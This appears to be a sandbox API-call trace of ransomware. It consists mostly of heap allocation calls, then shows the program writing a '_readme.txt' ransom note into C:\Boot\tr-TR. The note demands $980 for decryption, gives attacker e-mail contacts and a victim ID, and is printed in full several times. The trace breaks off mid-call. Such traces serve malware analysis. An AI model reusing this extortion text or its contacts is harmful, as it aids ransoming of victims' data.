[0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.931] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0142.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.931] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.931] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.931] PathFindFileNameW (pszPath="") returned="" [0142.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.931] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.931] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3221ae8 [0142.931] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aaf2b8 [0142.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.932] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.932] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0142.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.932] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0142.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.933] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.933] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.933] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.933] HeapFree (in: 